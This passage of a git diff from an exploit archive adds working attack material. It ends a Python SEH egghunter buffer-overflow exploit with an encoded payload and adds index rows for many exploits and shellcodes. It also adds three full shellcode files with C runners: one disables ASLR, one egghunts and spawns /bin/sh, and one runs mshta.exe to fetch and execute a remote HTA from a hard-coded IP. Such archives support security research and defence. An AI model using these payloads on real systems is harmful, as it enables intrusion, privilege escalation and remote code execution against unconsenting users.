+buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
+buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
+buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
+buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
+buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
+buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
+buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
+buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
+buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
+buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
+buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
+buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
+buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
+buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
+buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
+buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
+buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
+buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
+buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
+buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
+buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
+
+exploit = "A"*3876
+exploit += "\x74\x06\x75\x04"
+# 0x1001062d - pop pop ret - reg.dll
+exploit += "\x2d\x06\x01\x10"
+exploit += egg
+exploit += "D"*(10000-3884-len(egg)-len(buf)-8)
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index cc50ac2d9..a47226220 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6754,6 +6754,7 @@ id,file,description,date,author,type,platform,port
 48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
 48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows,
 48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux,
+48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11125,6 +11126,13 @@ id,file,description,date,author,type,platform,port
 48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
 48685,exploits/windows/local/48685.py,"FTPDummy 4.80 - Local Buffer Overflow (SEH)",2020-07-23,"Felipe Winsnes",local,windows,
 48686,exploits/windows/local/48686.py,"Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)",2020-07-23,MasterVlad,local,windows,
+48687,exploits/windows/local/48687.py,"Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)",2020-07-26,"Felipe Winsnes",local,windows,
+48688,exploits/windows/local/48688.py,"Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48689,exploits/windows/local/48689.py,"DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48691,exploits/windows/local/48691.py,"Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48695,exploits/windows/local/48695.py,"Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)",2020-07-26,"Sarang Tumne",local,windows,
+48696,exploits/windows/local/48696.py,"Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)",2020-07-26,"Eduard Palisek",local,windows,
+48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42933,3 +42941,23 @@ id,file,description,date,author,type,platform,port
 48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php,
 48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,
 48684,exploits/hardware/webapps/48684.txt,"UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass",2020-07-23,LiquidWorm,webapps,hardware,
+48690,exploits/php/webapps/48690.txt,"GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)",2020-07-26,Balzabu,webapps,php,
+48692,exploits/java/webapps/48692.py,"ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection",2020-07-26,aldorm,webapps,java,
+48693,exploits/multiple/webapps/48693.go,"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution",2020-07-26,"Patrick Hener",webapps,multiple,
+48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware,
+48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
+48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
+48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,
+48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php,
+48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php,
+48705,exploits/php/webapps/48705.txt,"elaniin CMS - Authentication Bypass",2020-07-26,BKpatron,webapps,php,
+48706,exploits/php/webapps/48706.txt,"Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)",2020-07-26,V1n1v131r4,webapps,php,
+48707,exploits/php/webapps/48707.txt,"PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting",2020-07-26,AppleBois,webapps,php,
+48708,exploits/multiple/webapps/48708.txt,"Bio Star 2.8.2 - Local File Inclusion",2020-07-26,"SITE Team",webapps,multiple,
+48709,exploits/php/webapps/48709.txt,"Webtareas 2.1p - Arbitrary File Upload (Authenticated)",2020-07-26,AppleBois,webapps,php,
+48711,exploits/hardware/webapps/48711.py,"F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion",2020-07-26,"Carlos E. Vieira",webapps,hardware,
+48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,
+48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,
+48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php,
+48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
+48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 5b4a7b3f8..b4f57a163 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1024,3 +1024,6 @@ id,file,description,date,author,type,platform
 48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
 48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
+48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
+48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
+48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
diff --git a/shellcodes/linux_x86/48592.c b/shellcodes/linux_x86/48592.c
new file mode 100644
index 000000000..f9a60e101
--- /dev/null
+++ b/shellcodes/linux_x86/48592.c
@@ -0,0 +1,79 @@
+# Title: Linux/x86 - ASLR deactivation polymorphic shellcode ( 124 bytes )
+# Author: Xenofon Vassilakopoulos 
+# Date: 2020-06-11
+# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
+# Architecture: i686 GNU/Linux
+# Shellcode Length: 124 bytes
+# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-813.php
+# SLAE-ID: SLAE - 1314 
+# Description: polymorphic version of ASLR deactivation shellcode
+
+
+------------------ ASLR deactivation ------------------
+
+global _start
+
+section .text
+
+_start:
+        xor    ebx,ebx
+        mul    ebx
+        mov    DWORD [esp-0x4],eax
+        mov    DWORD [esp-0x8],0x65636170
+        mov    DWORD [esp-0xc],0x735f6176
+        mov    DWORD [esp-0x10],0x5f657a69
+        mov    DWORD [esp-0x14],0x6d6f646e
+        mov    DWORD [esp-0x18],0x61722f6c
+        mov    DWORD [esp-0x1c],0x656e7265
+        mov    DWORD [esp-0x20],0x6b2f7379
+        mov    DWORD [esp-0x24],0x732f636f
+        mov    DWORD [esp-0x28],0x72702f2f
+        sub    esp,0x28
+        mov    ebx,esp
+        mov    cx,0x301
+        mov    dx,0x2a1
+        add    dx,0x1b
+        mov    al, 0x5
+        int    0x80
+        mov    ebx,eax
+        push   ebx
+        mov    cx,0x3b30
+        push   cx
+        mov    ecx,esp
+        shr    edx, 16
+        inc    edx
+        mov    al,0x4
+        int    0x80
+        mov    al,0x1
+        int    0x80
+
+------------------ shellcode ------------------
+
+
+#include 
+#include 
+
+unsigned char code[] = \
+     "\x31\xdb\xf7\xe3\x89\x44\x24\xfc\xc7"
+     "\x44\x24\xf8\x70\x61\x63\x65\xc7\x44"
+     "\x24\xf4\x76\x61\x5f\x73\xc7\x44\x24"
+     "\xf0\x69\x7a\x65\x5f\xc7\x44\x24\xec"
+     "\x6e\x64\x6f\x6d\xc7\x44\x24\xe8\x6c"
+     "\x2f\x72\x61\xc7\x44\x24\xe4\x65\x72"
+     "\x6e\x65\xc7\x44\x24\xe0\x79\x73\x2f"
+     "\x6b\xc7\x44\x24\xdc\x6f\x63\x2f\x73"
+     "\xc7\x44\x24\xd8\x2f\x2f\x70\x72\x83"
+     "\xec\x28\x89\xe3\x66\xb9\x01\x03\x66"
+     "\xba\xa1\x02\x66\x83\xc2\x1b\xb0\x05"
+     "\xcd\x80\x89\xc3\x53\x66\xb9\x30\x3b"
+     "\x66\x51\x89\xe1\xc1\xea\x10\x42\xb0"
+     "\x04\xcd\x80\xb0\x01\xcd\x80";
+
+main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/48703.c b/shellcodes/linux_x86/48703.c
new file mode 100644
index 000000000..5fb2f2c38
--- /dev/null
+++ b/shellcodes/linux_x86/48703.c
@@ -0,0 +1,75 @@
+# Exploit Title: Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
+# Author: danf42
+# Date: 2020-07-16
+# Platform: Linux/x86
+
+/*******************************************************************************
+ sigaction(2) approach to egghunting as described in  the paper 
+ "Safely Searching Process Virtual Address Space" by skape
+
+ The shellcode prepares the registers to start the hunting by clearing the 
+ direction flag and setting eax, ecx, and edx to 0
+
+Egg value is 0x50905090
+
+global _start
+
+section .text
+
+_start:
+    cld                     ; clear the direction flag
+    xor ecx, ecx            ; clear ecx
+    mul ecx                 ; multiply by ecx, zero out eax and edx
+IncPage:
+    or cx, 0xfff            ; Align page address
+IncAddr:
+    inc ecx                 ; Go to next address
+    push byte 0x43          ; syscall for sigaction()
+    pop eax                 ; Put syscall value into EAX
+    int 0x80                ; call sigaction() to check memory location [ECX]
+    cmp al, 0xf2            ; Did it return EFAULT, Bad Address
+    jz IncPage              ; Skip page if it returned EFAULT
+    mov eax, 0x50905090     ; Store EGG in EAX
+    mov edi, ecx            ; Move ECX to EDI for scasd operation
+    scasd                   ; Check if [EDI] == EAX then increment EDI
+    jnz IncAddr             ; Increment address if no match 
+    scasd                   ; Check if [EDI] == EAX then increment EDI
+    jnz IncAddr             ; Increment address if no match
+    jmp edi                 ; Jump to EDI (our shellcode) if both eggs are found 
+
+POC Shellcode to execute /bin/sh
+  xor ecx, ecx      ; clear ecx
+  mul ecx           ; mutliply eax by 0  
+  push eax          ; push eax onto stack 
+  push 0x68732f2f   ; push ASCII sh// onto stack
+  push 0x6e69622f   ; push ASCII nib/ onto stack
+  mov ebx, esp      ; push /bin/sh into ebx
+  mov al, 0xb       ; mov 11 into lower byte of eax
+  int 0x80          ; execute execve syscall
+
+  mov al,0x01       ; move 1 into lower byte of each
+  xor ebx,ebx       ; clear ebx
+  int 0x80          ; execute exit syscall
+ 
+To Cmpile: 
+ gcc sigaction_egghunter.c -fno-stack-protector -z execstack -o sigaction_egghunter
+
+*******************************************************************************/
+
+#include
+#include
+
+unsigned char egghunter[] = "\xfc\x31\xc9\xf7\xe1\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
+
+unsigned char shellcode[] = "\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc9\xf7\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xcd\x80";
+
+void main()
+{
+        printf("Egghunter Length: %d\n", strlen(egghunter));
+        printf("Shellcode Length: %d\n", strlen(shellcode));
+
+	int (*ret)() = (int(*)())egghunter;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/48718.c b/shellcodes/windows_x86/48718.c
new file mode 100644
index 000000000..904b38aaf
--- /dev/null
+++ b/shellcodes/windows_x86/48718.c
@@ -0,0 +1,69 @@
+# Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
+# Shellcode Author: Siddharth Sharma
+# Shellcode Length: ~100 bytes
+# Tested on: WIN7x86
+# Date: 2020-06-16
+
+/*
+
+#Description
+# Simply, instead of using mshta.exe to download file as: 
+mshta.exe http://:/ ,
+# We could use below shellcode that does the same.
+
+
+
+=============================
+xor eax, eax              ;clear eax,get msvcrt.dll               
+mov ax, 0x7472             ;"tr\0\0"               
+push eax
+push dword 0x6376736d 	   ;cvsm        
+push esp
+
+
+mov ebx,0x77e3395c         ;call LoadLibraryA
+call ebx
+mov ebp,eax		    ;msvcrt.dll is saved in ebp
+
+
+;mshta.exe http://192.168.43.192:8080/9MKWaRO.hta
+xor eax,eax
+PUSH eax
+PUSH 0x6174682e         ;".hta"
+PUSH 0x4f526157		;"WaRO"
+PUSH 0x4b4d392f		;"/9MK"
+PUSH 0x38303830		;"8080"
+PUSH 0x3a323931		;"192:"
+PUSH 0x2e33342e		;".43."
+PUSH 0x3836312e		;".168"
+PUSH 0x3239312f		;"/192"
+PUSH 0x2f3a7074		;"tp:/"
+PUSH 0x74682065		;"e ht"
+PUSH 0x78652e61		;"a.ex"
+PUSH 0x7468736d		;"msht"
+
+
+
+MOV EDI,ESP          ;adding a pointer to the stack                  
+PUSH EDI
+
+
+Mov eax,0x6ffab16f	    ;call System	
+call eax
+
+xor eax, eax
+push eax
+mov eax, 0x77e3214f         ;call ExitProcess
+call eax
+=====================================
+*/
+
+
+char code[] = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xe3\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x68\x74\x61\x68\x57\x61\x52\x4f\x68\x2f\x39\x4d\x4b\x68\x30\x38\x30\x38\x68\x31\x39\x32\x3a\x68\x2e\x34\x33\x2e\x68\x2e\x31\x36\x38\x68\x2f\x31\x39\x32\x68\x74\x70\x3a\x2f\x68\x65\x20\x68\x74\x68\x61\x2e\x65\x78\x68\x6d\x73\x68\x74\x89\xe7\x57\xb8\x6f\xb1\xfa\x6f\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xe3\x77\xff\xd0";
+
+int main(int argc, char **argv)
+{
+	int(*func)();
+	func = (int(*)()) code;
+	(int)(*func)();
+}
\ No newline at end of file